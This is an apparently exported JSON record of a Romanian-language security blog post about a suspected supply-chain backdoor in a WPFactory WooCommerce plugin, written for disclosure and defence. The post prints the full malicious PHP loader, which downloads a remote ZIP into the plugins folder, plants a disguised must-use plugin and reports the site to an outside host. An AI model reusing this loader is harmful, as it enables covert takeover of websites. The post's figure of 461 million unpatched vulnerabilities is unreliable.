{"id":24971,"date":"2026-05-07T11:48:23","date_gmt":"2026-05-07T09:48:23","guid":{"rendered":"https:\/\/www.ferberenterprises.com\/?p=24971"},"modified":"2026-05-07T23:41:40","modified_gmt":"2026-05-07T21:41:40","slug":"security-breach-at-wpfactory-170000-wordpress-sites-exposed","status":"publish","type":"post","link":"https:\/\/www.ferberenterprises.com\/ro\/security-breach-at-wpfactory-170000-wordpress-sites-exposed\/","title":{"rendered":"Bre\u0219\u0103 de securitate la WPFactory: 170.000 de site-uri WordPress au fost compromise"},"content":{"rendered":"<p>WordPress r\u0103m\u00e2ne cel mai utilizat sistem de management al con\u021binutului din lume, aliment\u00e2nd peste 40% din toate site-urile web de pe internet. De la site-uri web pentru afaceri mici \u0219i bloguri personale, la platforme mari pentru \u00eentreprinderi \u0219i infrastructuri de e-commerce, CMS-ul a devenit coloana vertebral\u0103 a web-ului modern. Popularitatea sa provine din flexibilitatea sa, ecosistemul deschis \u0219i num\u0103rul vast de plugin-uri disponibile pentru extinderea func\u021bionalit\u0103\u021bii sale.<\/p>\n\n\n\n<p>Cu toate acestea, acela\u0219i ecosistem a devenit \u0219i una dintre cele mai mari provoc\u0103ri de securitate ale WordPress.<\/p>\n\n\n\n<p>La Ferber Enterprises, echipa noastr\u0103 de securitate cibernetic\u0103 monitorizeaz\u0103 \u00een permanen\u021b\u0103 amenin\u021b\u0103rile care afecteaz\u0103 ecosistemul WordPress, deoarece vulnerabilit\u0103\u021bile din pluginuri, teme sau lan\u021burile de aprovizionare se pot transforma rapid \u00een atacuri la scar\u0103 larg\u0103, care afecteaz\u0103 mii de site-uri web la nivel global. \u00cen ultimii ani, atacatorii au vizat din ce \u00een ce mai mult dezvoltatorii de pluginuri \u0219i infrastructurile de distribu\u021bie, mai degrab\u0103 dec\u00e2t site-urile web individuale, permi\u021b\u00e2nd r\u0103sp\u00e2ndirea codului r\u0103u inten\u021bionat prin actualiz\u0103ri de software de \u00eencredere \u0219i canale oficiale de desc\u0103rcare.<\/p>\n\n\n\n<p>\u00cen aceast\u0103 s\u0103pt\u0103m\u00e2n\u0103 a izbucnit o controvers\u0103 major\u0103 \u00een care este implicat\u0103 WPFactory, un cunoscut dezvoltator de pluginuri WordPress ale c\u0103rui produse sunt instalate pe peste 170.000 de site-uri web din \u00eentreaga lume. Peste 80 de pluginuri asociate companiei au fost suspendate temporar pe WordPress.org dup\u0103 ce echipa noastr\u0103 de securitate cibernetic\u0103 de la WPFactory a descoperit o posibil\u0103 u\u0219\u0103 ascuns\u0103 \u00een versiunea premium a unuia dintre pluginurile sale.<\/p>\n\n\n\n<p>Incidentul a st\u00e2rnit \u00eengrijor\u0103ri serioase \u00een \u00eentreaga comunitate WordPress cu privire la securitatea lan\u021bului de aprovizionare software, procesele de revizuire a plugin-urilor \u0219i sofisticarea \u00een cre\u0219tere a atacurilor care vizeaz\u0103 ecosistemul open-source.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Descoperirea Comportamentului Suspect al Plugin-ului<\/h2>\n\n\n\n<p>Problema a ie\u0219it la \u021binut de prima dat\u0103 dup\u0103 ce echipa noastr\u0103 de securitate cibernetic\u0103 de la Ferber Enterprises a observat un comportament anormal \u00een timpul test\u0103rii versiunii premium a pluginului \u201eEU VAT for WooCommerce Pro\u201d, distribuit direct de pe site-ul oficial al acestuia.<\/p>\n\n\n\n<p>Ini\u021bial, investiga\u021bia a \u00eenceput dup\u0103 ce plugin-ul a generat o eroare fatal\u0103 \u00een timpul instal\u0103rii. \u00cen timp ce depanau problema, anali\u0219tii no\u0219tri au identificat un fi\u0219ier PHP suspect numit class-alg-wc-eu-vat-customer.php. Fi\u0219ierul p\u0103rea s\u0103 execute un comportament complet inconsistent cu func\u021bionalitatea a\u0219teptat\u0103 a unui plugin WooCommerce VAT.<\/p>\n\n\n\n<link rel=\"stylesheet\"\nhref=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/styles\/vs2015.min.css\">\n\n<script src=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.9.0\/highlight.min.js\"><\/script>\n\n<script>\ndocument.addEventListener(\"DOMContentLoaded\", () => {\n    hljs.highlightAll();\n});\n<\/script>\n\n<span data-no-translation=\"\">\n\n<div style=\"    margin:30px 0;    border-radius:12px;    overflow:hidden;    box-shadow:0 0 25px rgba(0,0,0,0.35);    border:1px solid #2d2d2d;\">\n\n<div style=\"    background:#111;    color:#aaa;    padding:12px 18px;    font-family:monospace;    font-size:14px;    border-bottom:1px solid #2d2d2d;    display:flex;    justify-content:space-between;    align-items:center;\">\n    <span>class-alg-wc-eu-vat-customer.php<\/span>\n    <span style=\"color:#ff5f56;\">\u25cf<\/span>\n<\/div>\n\n<pre style=\"    margin:0;    padding:25px;    background:#1e1e1e;    overflow:auto;    font-size:14px;    line-height:1.6;\"><code class=\"language-php\">&lt;?php\nrequire_once dirname(__FILE__, 5) . '\/wp-load.php';\n$h = strtolower(preg_replace('\/:\\d+$\/', '', $_SERVER&#91;'HTTP_HOST'] ?? ''));\n$s = (!empty($_SERVER&#91;'HTTPS']) &amp;&amp; $_SERVER&#91;'HTTPS'] !== 'off') ? 'https' : 'http';\n$ch = curl_init(\"$s:\/\/$h\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/eu-vat-for-woocommerce-pro.php\");\ncurl_setopt_array($ch, &#91;\n    CURLOPT_NOBODY =&gt; 1,\n    CURLOPT_RETURNTRANSFER =&gt; 1,\n    CURLOPT_TIMEOUT =&gt; 10,\n    CURLOPT_SSL_VERIFYPEER =&gt; 0\n]);\ncurl_exec($ch);\n$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\ncurl_close($ch);\nif ($code !== 403 || ($_GET&#91;'scaramooch'] ?? '') === 'refresh') {\n    $url = 'https:\/\/foodylicious.co.uk\/change\/akismet-pro.zip';\n    $zipPath = sys_get_temp_dir() . '\/plugin.zip';\n    $zipData = file_get_contents($url);\n    if ($zipData === false) {\n        exit('Download failed');\n    }\n    file_put_contents($zipPath, $zipData);\n    $zip = new ZipArchive;\n    if ($zip-&gt;open($zipPath) === TRUE) {\n        $zip-&gt;extractTo(dirname(__FILE__, 5) . '\/wp-content\/plugins\/');\n        $zip-&gt;close();\n    } else {\n        exit('ZIP open failed');\n    }\n    unlink($zipPath);\n} else {\n    $url = \"https:\/\/foodylicious.co.uk\/change\/scara.php\";\n    $code = file_get_contents($url);\n    if ($code !== false) {\n\n        $baseDir = dirname(__FILE__, 4);\n\n        $folderName = 'mu-plugins';\n\n        $dir = $baseDir . '\/' . $folderName;\n\n        if (!is_dir($dir)) {\n            mkdir($dir, 0755, true);\n        }\n\n        file_put_contents($dir . '\/wp-redis.php', $code);\n    }\n}\n$data = &#91;\n    'site_url' =&gt; get_site_url() . '\/wp-content\/plugins\/eu-vat-for-woocommerce-pro\/',\n];\nwp_remote_post('https:\/\/foodylicious.co.uk\/change\/tracks.php', &#91;\n    'body' =&gt; $data,\n    'timeout' =&gt; 10,\n]);<\/code><\/pre><\/div><\/span>\n\n\n\n<p>Conform analizei noastre, codul a \u00eencercat s\u0103:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Descarc\u0103 o arhiv\u0103 ZIP extern\u0103 de pe un server de la distan\u021b\u0103<\/li>\n\n\n\n<li>Modific\u0103 directoarele de baz\u0103 WordPress<\/li>\n\n\n\n<li>Comunica\u021bi cu infrastructura extern\u0103<\/li>\n\n\n\n<li>Poten\u021bial, executa\u021bi sarcini utile de la distan\u021b\u0103 pe site-urile web afectate<\/li>\n<\/ul>\n\n\n\n<p>Ace\u0219ti indicatori au sugerat imediat prezen\u021ba posibil\u0103 a unei u\u0219i din spate ascunse sau a unei compromiteri mali\u021bioase a lan\u021bului de aprovizionare.<\/p>\n\n\n\n<p>Ceea ce a f\u0103cut situa\u021bia deosebit de \u00eengrijor\u0103toare a fost faptul c\u0103 pluginul nu fusese desc\u0103rcat de pe un server oglind\u0103 neoficial sau dintr-un depozit piratat. Pachetul a fost desc\u0103rcat direct de pe portalul oficial pentru clien\u021bi al WPFactory, ceea ce a alimentat \u00eengrijor\u0103rile c\u0103 \u00eens\u0103\u0219i canalul de distribu\u021bie ar fi putut fi compromis.<\/p>\n\n\n\n<p>La Ferber Enterprises, am documentat imediat incidentul \u0219i am demarat un proces de raportare responsabil\u0103, contact\u00e2nd direct WPFactory prin GitHub.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b8b3baa1\"><h2 class=\"uagb-heading-text\">R\u0103spunsul ini\u021bial din partea WPFactory<\/h2><\/div>\n\n\n\n<p>WPFactory a r\u0103spuns ini\u021bial afirm\u00e2nd c\u0103 fi\u0219ierul \u0219i comportamentul suspect descrise \u00een raport nu f\u0103ceau parte din codul lor oficial.<\/p>\n\n\n\n<p>Un reprezentant al companiei a sugerat mai multe explica\u021bii alternative, inclusiv:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>O instalare local\u0103 modificat\u0103<\/li>\n\n\n\n<li>Un mediu de site web compromis<\/li>\n\n\n\n<li>O versiune de plugin dep\u0103\u0219it\u0103<\/li>\n\n\n\n<li>O surs\u0103 de desc\u0103rcare poten\u021bial compromis\u0103<\/li>\n<\/ul>\n\n\n\n<p>Compania a mai afirmat c\u0103 nu a putut inspecta \u00een siguran\u021b\u0103 fi\u0219ierul ZIP furnizat, deoarece browserul lor a marcat arhiva ca fiind poten\u021bial nesigur\u0103.<\/p>\n\n\n\n<p>Echipa noastr\u0103 de securitate cibernetic\u0103 a precizat ulterior c\u0103 pluginul fusese desc\u0103rcat direct de pe site-ul oficial al WPFactory \u0219i c\u0103 fi\u0219ierul suspect a r\u0103mas prezent chiar \u0219i dup\u0103 desc\u0103rcarea unei copii noi a versiunii 4.6.1 de la aceea\u0219i surs\u0103.<\/p>\n\n\n\n<p>Acest detaliu a devenit un element central al anchetei. Dac\u0103 mai multe desc\u0103rc\u0103ri independente de pe canalul oficial de distribu\u021bie con\u021bineau \u00een mod constant acela\u0219i cod suspect, posibilitatea ca un site web local s\u0103 fi fost compromis devenea din ce \u00een ce mai pu\u021bin probabil\u0103. \u00cen ciuda acestor constat\u0103ri, WPFactory a declarat ini\u021bial c\u0103 nu a reu\u0219it s\u0103 reproduc\u0103 problema la nivelul s\u0103u \u0219i a sus\u021binut c\u0103 fi\u0219ierul suspect nu exista \u00een pachetul oficial al pluginului.<\/p>\n\n\n\n<p>Compania a solicitat apoi acces de administrator \u0219i FTP la mediul afectat pentru a continua investiga\u021bia. La Ferber Enterprises, am respins aceast\u0103 solicitare din motive de securitate cibernetic\u0103. Acordarea accesului privilegiat la server unui furnizor a c\u0103rui infrastructur\u0103 ar fi putut fi ea \u00eens\u0103\u0219i compromis\u0103 ar fi reprezentat un risc de securitate inacceptabil. \u00cen schimb, echipa noastr\u0103 a continuat s\u0103 furnizeze dovezi tehnice, inclusiv o demonstra\u021bie video care ar\u0103ta comportamentul suspect al pluginului imediat dup\u0103 instalare.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-b43078c2\"><h2 class=\"uagb-heading-text\">Escaladare c\u0103tre WordPress.org<\/h2><\/div>\n\n\n\n<p>Pe m\u0103sur\u0103 ce ancheta a avansat, au crescut \u00eengrijor\u0103rile cu privire la amploarea poten\u021bial\u0103 a problemei. WPFactory de\u021bine un portofoliu extins de pluginuri, cuprinz\u00e2nd peste 65 de pluginuri, cu un total de peste 170.000 de instal\u0103ri active. Prin urmare, orice bre\u0219\u0103 de securitate care ar afecta infrastructura de distribu\u021bie a companiei ar putea avea consecin\u021be pe scar\u0103 larg\u0103 \u00een \u00eentregul ecosistem WordPress.<\/p>\n\n\n\n<p>Echipa noastr\u0103 a semnalat problema direct c\u0103tre WordPress.org, \u00een \u00eencercarea de a \u00eempiedica al\u021bi utilizatori s\u0103 instaleze pachete poten\u021bial compromise pe durata desf\u0103\u0219ur\u0103rii anchetei. Ulterior, WordPress.org a luat m\u0103sura excep\u021bional\u0103 de a retrage temporar peste 80 de pluginuri WPFactory din depozitul oficial.<\/p>\n\n\n\n<p>Aceast\u0103 m\u0103sur\u0103 a atras imediat aten\u021bia \u00eentregii comunit\u0103\u021bi de securitate WordPress, deoarece \u00eenchiderea \u00een mas\u0103 a pluginurilor la o asemenea scar\u0103 este relativ rar\u0103 \u0219i indic\u0103, de obicei, probleme grave nerezolvate. \u00cen urma escalad\u0103rii situa\u021biei, WPFactory a recunoscut ulterior c\u0103 problema p\u0103rea real\u0103 \u0219i \u0219i-a cerut scuze pentru c\u0103 nu a reac\u021bionat mai rapid la raportul ini\u021bial. Reprezentan\u021bii companiei au declarat c\u0103 investigheaz\u0103 activ problema \u0219i lucreaz\u0103 la g\u0103sirea unei solu\u021bii. O ipotez\u0103 ridicat\u0103 intern de WPFactory sugereaz\u0103 c\u0103 un pachet de pluginuri \u00eenvechit sau stocat \u00een cache ar fi putut fi distribuit involuntar prin infrastructura lor.<\/p>\n\n\n\n<p>Cu toate acestea, echipa noastr\u0103 de securitate cibernetic\u0103 nu a fost de acord cu aceast\u0103 evaluare. Comportamentul observat a indicat puternic o problem\u0103 de securitate mai profund\u0103, care ar putea implica conducte de compilare, sisteme de distribu\u021bie compromise sau injectare neautorizat\u0103 de cod \u00een arhivele de plugin-uri desc\u0103rcabile.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">De ce conteaz\u0103 acest incident<\/h2>\n\n\n\n<p>Controversa WPFactory scoate \u00een eviden\u021b\u0103 o amenin\u021bare tot mai mare la adresa securit\u0103\u021bii cibernetice, cunoscut\u0103 sub numele de \u201eatac asupra lan\u021bului de aprovizionare cu software\u201d. \u00cen mod tradi\u021bional, atacatorii se concentrau pe compromiterea direct\u0103 a site-urilor web individuale prin atacuri de tip \u201ebrute-force\u201d sau prin vulnerabilit\u0103\u021bi ale plugin-urilor. \u00cen prezent, actorii r\u0103u inten\u021biona\u021bi vizeaz\u0103 din ce \u00een ce mai mult chiar furnizorii de software, deoarece compromiterea unui furnizor de \u00eencredere permite r\u0103sp\u00e2ndirea codului r\u0103u inten\u021bionat c\u0103tre mii de site-uri web simultan.<\/p>\n\n\n\n<p>Aceast\u0103 strategie a fost deja observat\u0103 \u00een mai multe incidente cibernetice de mare profil care au afectat ecosisteme globale de software \u00een ultimul deceniu. \u00cen special \u00een ecosistemul WordPress, dezvoltatorii de pluginuri reprezint\u0103 \u021binte atractive, deoarece pluginurile sunt \u00een mod inerent de \u00eencredere pentru administratori \u0219i opereaz\u0103 adesea cu permisiuni ridicate.<\/p>\n\n\n\n<p>Dac\u0103 un cod r\u0103u inten\u021bionat este introdus \u00eentr-un pachet de plugin distribuit printr-un canal oficial, site-urile web afectate pot instala ele \u00eensele, f\u0103r\u0103 s\u0103-\u0219i dea seama, programe malware. \u00cen cazul pluginului suspect WPFactory, consecin\u021bele poten\u021biale sunt grave.<\/p>\n\n\n\n<p>Pe baza analizei noastre, comportamentul identificat ar putea teoretic permite atacatorilor s\u0103:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Implementeaz\u0103 malware suplimentar<\/li>\n\n\n\n<li>Injecta\u021bi spam SEO<\/li>\n\n\n\n<li>Creeaz\u0103 backdoors persistente<\/li>\n\n\n\n<li>Exfiltrarea datelor sensibile<\/li>\n\n\n\n<li>Modific\u0103 instala\u021biile WordPress la distan\u021b\u0103<\/li>\n\n\n\n<li>Men\u021bine acces neautorizat pe perioade extinse<\/li>\n<\/ul>\n\n\n\n<p>Pericolul unor astfel de atacuri const\u0103 \u00een natura lor ascuns\u0103. U\u0219ile din spate moderne sunt adesea concepute pentru a r\u0103m\u00e2ne \u00een stare latent\u0103 timp de luni de zile \u00eenainte de a se activa, f\u0103c\u00e2nd detectarea semnificativ mai dificil\u0103. La \u00eenceputul acestei luni, echipa WordPress Plugins a \u00eenchis peste 30 de pluginuri, dup\u0103 ce un cod mali\u021bios ascuns, \u00eencorporat \u00eentr-un alt portofoliu de pluginuri, a r\u0103mas inactiv timp de aproximativ opt luni \u00eenainte de a se activa \u00een cele din urm\u0103 \u0219i de a injecta spam SEO pe site-uri web.<\/p>\n\n\n\n<p>Aceast\u0103 tendin\u021b\u0103 demonstreaz\u0103 cum atacatorii prioritizeaz\u0103 tot mai mult persisten\u021ba \u0219i activarea \u00eent\u00e2rziat\u0103 pentru a eluda mecanismele de detec\u021bie.<\/p>\n\n\n\n<div class=\"wp-block-uagb-advanced-heading uagb-block-c956d27d\"><h2 class=\"uagb-heading-text\">O criz\u0103 de securitate mai ampl\u0103 \u00een ecosistemul WordPress<\/h2><\/div>\n\n\n\n<p>Incidentul WPFactory scoate la iveal\u0103 \u0219i provoc\u0103ri sistemice mai ample \u00een materie de securitate, care afecteaz\u0103 WordPress \u00een ansamblu. Ecosistemul de pluginuri s-a extins dramatic \u00een ultimul deceniu, zeci de mii de pluginuri fiind disponibile at\u00e2t pe pie\u021bele oficiale, c\u00e2t \u0219i pe cele comerciale. De\u0219i acest ecosistem stimuleaz\u0103 inovarea \u0219i flexibilitatea, el genereaz\u0103 totodat\u0103 o complexitate enorm\u0103 \u00een ceea ce prive\u0219te supravegherea securit\u0103\u021bii.<\/p>\n\n\n\n<p>Conform raportului \u201cStarea securit\u0103\u021bii WordPress \u00een 2026\u201d realizat de Patchstack, aproape 461 de milioane de vulnerabilit\u0103\u021bi cunoscute nu au fost remediate \u00eenainte de a fi f\u0103cute publice. Aceast\u0103 statistic\u0103 reflect\u0103 presiunea tot mai mare la care sunt supu\u0219i at\u00e2t dezvoltatorii de pluginuri, c\u00e2t \u0219i cercet\u0103torii \u00een domeniul securit\u0103\u021bii \u0219i administratorii de depozite.<\/p>\n\n\n\n<p>\u00cen acela\u0219i timp, se pare c\u0103 coada oficial\u0103 de revizuire a pluginurilor WordPress dep\u0103\u0219e\u0219te acum 4.000 de pluginuri care a\u0219teapt\u0103 s\u0103 fie revizuite. Astfel de cifre ilustreaz\u0103 provocarea imens\u0103 de a men\u021bine asigurarea calit\u0103\u021bii \u0219i auditul de securitate la scar\u0103 larg\u0103.<\/p>\n\n\n\n<p>Mul\u021bi dezvoltatori de pluginuri sunt echipe mici, cu resurse limitate \u00een materie de securitate. Al\u021bii gestioneaz\u0103 zeci de pluginuri simultan, pun\u00e2nd \u00een aplicare strategii agresive de cre\u0219tere comercial\u0103 care implic\u0103 achizi\u021bii \u0219i extinderea portofoliului. Chiar \u0219i WPFactory s-a extins recent prin achizi\u021bii, printre care achizi\u021bia Extend-WP \u0219i a celor 19 pluginuri ale sale \u00een 2025, urmat\u0103 de achizi\u021bia WBW \u0219i a mai multor pluginuri suplimentare \u00een aceea\u0219i an.<\/p>\n\n\n\n<p>Expansiunea rapid\u0103 a portofoliului poate crea complexitate opera\u021bional\u0103 care complic\u0103 auditarea codului, managementul infrastructurii \u0219i verificarea integrit\u0103\u021bii lans\u0103rilor. Atacatorii sunt con\u0219tien\u021bi de aceste realit\u0103\u021bi. Din ce \u00een ce mai mult, ei se concentreaz\u0103 pe exploatarea practicilor slabe de securitate opera\u021bional\u0103 din cadrul furnizorilor de software, \u00een loc s\u0103 vizeze direct utilizatorii finali.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Importan\u021ba cresc\u00e2nd\u0103 a securit\u0103\u021bii lan\u021bului de aprovizionare<\/h2>\n\n\n\n<p>Incidente precum acestea \u00eent\u0103resc nevoia urgent\u0103 de practici mai robuste de securitate a lan\u021bului de aprovizionare \u00een \u00eentregul ecosistem WordPress.<\/p>\n\n\n\n<p>La Ferber Enterprises, echipa noastr\u0103 de securitate cibernetic\u0103 recomand\u0103 cu t\u0103rie dezvoltatorilor de pluginuri s\u0103 adopte c\u00e2teva m\u0103suri esen\u021biale de protec\u021bie, printre care:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Semnarea pachetelor criptografice<\/li>\n\n\n\n<li>Securizarea fluxurilor de lucru CI\/CD<\/li>\n\n\n\n<li>Autentificare multi-factor obligatorie<\/li>\n\n\n\n<li>Segmentarea infrastructurii<\/li>\n\n\n\n<li>Monitorizare continu\u0103 a integrit\u0103\u021bii<\/li>\n\n\n\n<li>Audituri de cod independente<\/li>\n\n\n\n<li>Sisteme de build reproductibile<\/li>\n<\/ul>\n\n\n\n<p>Administratorii de website ar trebui, de asemenea, s\u0103-\u0219i consolideze propria postur\u0103 de securitate. Chiar \u0219i pluginurile desc\u0103rcate din surse oficiale sau de \u00eencredere nu ar trebui considerate inerent sigure.<\/p>\n\n\n\n<p>Organiza\u021biile care gestioneaz\u0103 infrastructuri critice WordPress ar trebui s\u0103 ia \u00een considerare:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Men\u021binerea mediilor de staging<\/li>\n\n\n\n<li>Monitorizarea traficului de ie\u0219ire<\/li>\n\n\n\n<li>Scanarea pluginurilor \u00eenainte de implementare<\/li>\n\n\n\n<li>Limitarea utiliz\u0103rii plugin-urilor<\/li>\n\n\n\n<li>Aplicarea controalelor de acces cu cel mai mic privilegiu<\/li>\n\n\n\n<li>Implementarea monitoriz\u0103rii integrit\u0103\u021bii fi\u0219ierelor<\/li>\n\n\n\n<li>Utilizarea firewall-urilor gestionate pentru aplica\u021bii web (WAF)<\/li>\n<\/ul>\n\n\n\n<p>\u00cen mediile de \u00eentreprindere, validarea lan\u021bului de aprovizionare devine la fel de important\u0103 ca managementul tradi\u021bional al vulnerabilit\u0103\u021bilor. Presupunerea c\u0103 canalele oficiale de software sunt \u00eentotdeauna sigure nu mai este realist\u0103 \u00een peisajul amenin\u021b\u0103rilor de ast\u0103zi.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Reac\u021bii ale comunit\u0103\u021bii \u0219i investiga\u021bie \u00een curs<\/h2>\n\n\n\n<p>Controversa s-a r\u0103sp\u00e2ndit rapid \u00een comunitatea WordPress, dup\u0103 ce dezvoltatorii, cercet\u0103torii \u00een securitate \u0219i furnizorii de infrastructur\u0103 au \u00eenceput s\u0103 discute public problema.<\/p>\n\n\n\n<p>Mai multe personalit\u0103\u021bi cunoscute din cadrul ecosistemului au contribuit la sensibilizarea publicului cu privire la aceast\u0103 situa\u021bie, printre care \u0219i dezvoltatori care au publicat liste cu pluginurile \u00eenchise temporar \u0219i au \u00eencurajat administratorii s\u0103-\u0219i verifice mediile.<\/p>\n\n\n\n<p>\u00centre timp, echipa noastr\u0103 de la Ferber Enterprises continu\u0103 s\u0103 analizeze mostrele de pluginuri suspecte \u0219i s\u0103 monitorizeze apari\u021bia unor indicatori suplimentari de compromitere care ar putea afecta site-urile WordPress la nivel global.<\/p>\n\n\n\n<p>La momentul public\u0103rii, WPFactory a confirmat existen\u021ba problemei \u0219i a declarat c\u0103 lucreaz\u0103 activ la rezolvarea acesteia.<\/p>\n\n\n\n<p>Cu toate acestea, multe \u00eentreb\u0103ri r\u0103m\u00e2n f\u0103r\u0103 r\u0103spuns:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>A fost compromis\u0103 infrastructura oficial\u0103 de distribu\u021bie?<\/li>\n\n\n\n<li>C\u00e2t timp au fost pachetele mali\u021bioase distribuite poten\u021bial?<\/li>\n\n\n\n<li>Au fost afectate pluginuri suplimentare?<\/li>\n\n\n\n<li>Conturile clien\u021bilor sau sistemele de desc\u0103rcare au fost compromise?<\/li>\n\n\n\n<li>Au ob\u021binut atacatorii acces persistent la infrastructura intern\u0103?<\/li>\n\n\n\n<li>Ar putea exista \u00eenc\u0103 sarcini utile latente suplimentare?<\/li>\n<\/ul>\n\n\n\n<p>P\u00e2n\u0103 c\u00e2nd aceste \u00eentreb\u0103ri vor fi complet rezolvate, pruden\u021ba r\u0103m\u00e2ne esen\u021bial\u0103.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Viitorul securit\u0103\u021bii WordPress<\/h2>\n\n\n\n<p>Incidentul WPFactory ar putea deveni, \u00een cele din urm\u0103, un alt exemplu reprezentativ pentru provoc\u0103rile \u00een materie de securitate cibernetic\u0103 cu care se confrunt\u0103 ecosistemul web open-source.<\/p>\n\n\n\n<p>WordPress opereaz\u0103 o por\u021biune enorm\u0103 a economiei globale de internet. Orice compromitere la scar\u0103 larg\u0103 care afecteaz\u0103 dezvoltatorii de plugin-uri poate, prin urmare, avea consecin\u021be care se extind mult dincolo de site-urile individuale.<\/p>\n\n\n\n<p>Pe m\u0103sur\u0103 ce atacatorii continu\u0103 s\u0103-\u0219i perfec\u021bioneze metodele de compromitere a lan\u021bului de aprovizionare \u0219i tehnicile de persisten\u021b\u0103 ascuns\u0103, securitatea plugin-urilor nu mai poate fi considerat\u0103 o preocupare secundar\u0103. La Ferber Enterprises, consider\u0103m c\u0103 acest eveniment reprezint\u0103 un memento esen\u021bial al faptului c\u0103 securitatea cibernetic\u0103 nu se refer\u0103 doar la protejarea site-urilor web \u00een sine, ci \u0219i la securizarea fiec\u0103rui nivel al lan\u021bului de distribu\u021bie a software-ului.<\/p>\n\n\n\n<p>\u00cencrederea \u00een ecosistemele deschise depinde de transparen\u021b\u0103, r\u0103spuns rapid la incidente \u0219i practici solide de securitate opera\u021bional\u0103. Ecosistemul WordPress se afl\u0103 acum \u00eentr-un moment important.<\/p>\n\n\n\n<p>Modul \u00een care dezvoltatorii, administratorii de repository, furnizorii de hosting \u0219i echipele de securitate r\u0103spund la incidente de acest gen va contribui la determinarea capacit\u0103\u021bii WordPress de a continua s\u0103 men\u021bin\u0103 \u00eencrederea milioanelor de afaceri \u0219i organiza\u021bii care se bazeaz\u0103 pe el zilnic.<\/p>","protected":false},"excerpt":{"rendered":"<p>WordPress remains the most widely used content management system in the world, powering more than 40 percents of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":24973,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_uag_custom_page_level_css":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"set","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[181],"tags":[],"class_list":["post-24971","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"spectra_custom_meta":{"_uagb_previous_block_counts":["a:90:{s:21:\"uagb\/advanced-heading\";i:3;s:15:\"uagb\/blockquote\";i:0;s:12:\"uagb\/buttons\";i:0;s:18:\"uagb\/buttons-child\";i:0;s:19:\"uagb\/call-to-action\";i:0;s:15:\"uagb\/cf7-styler\";i:0;s:11:\"uagb\/column\";i:0;s:12:\"uagb\/columns\";i:0;s:14:\"uagb\/container\";i:0;s:21:\"uagb\/content-timeline\";i:0;s:27:\"uagb\/content-timeline-child\";i:0;s:14:\"uagb\/countdown\";i:0;s:12:\"uagb\/counter\";i:0;s:8:\"uagb\/faq\";i:0;s:14:\"uagb\/faq-child\";i:0;s:10:\"uagb\/forms\";i:0;s:17:\"uagb\/forms-accept\";i:0;s:19:\"uagb\/forms-checkbox\";i:0;s:15:\"uagb\/forms-date\";i:0;s:16:\"uagb\/forms-email\";i:0;s:17:\"uagb\/forms-hidden\";i:0;s:15:\"uagb\/forms-name\";i:0;s:16:\"uagb\/forms-phone\";i:0;s:16:\"uagb\/forms-radio\";i:0;s:17:\"uagb\/forms-select\";i:0;s:19:\"uagb\/forms-textarea\";i:0;s:17:\"uagb\/forms-toggle\";i:0;s:14:\"uagb\/forms-url\";i:0;s:14:\"uagb\/gf-styler\";i:0;s:15:\"uagb\/google-map\";i:0;s:11:\"uagb\/how-to\";i:0;s:16:\"uagb\/how-to-step\";i:0;s:9:\"uagb\/icon\";i:0;s:14:\"uagb\/icon-list\";i:0;s:20:\"uagb\/icon-list-child\";i:0;s:10:\"uagb\/image\";i:0;s:18:\"uagb\/image-gallery\";i:0;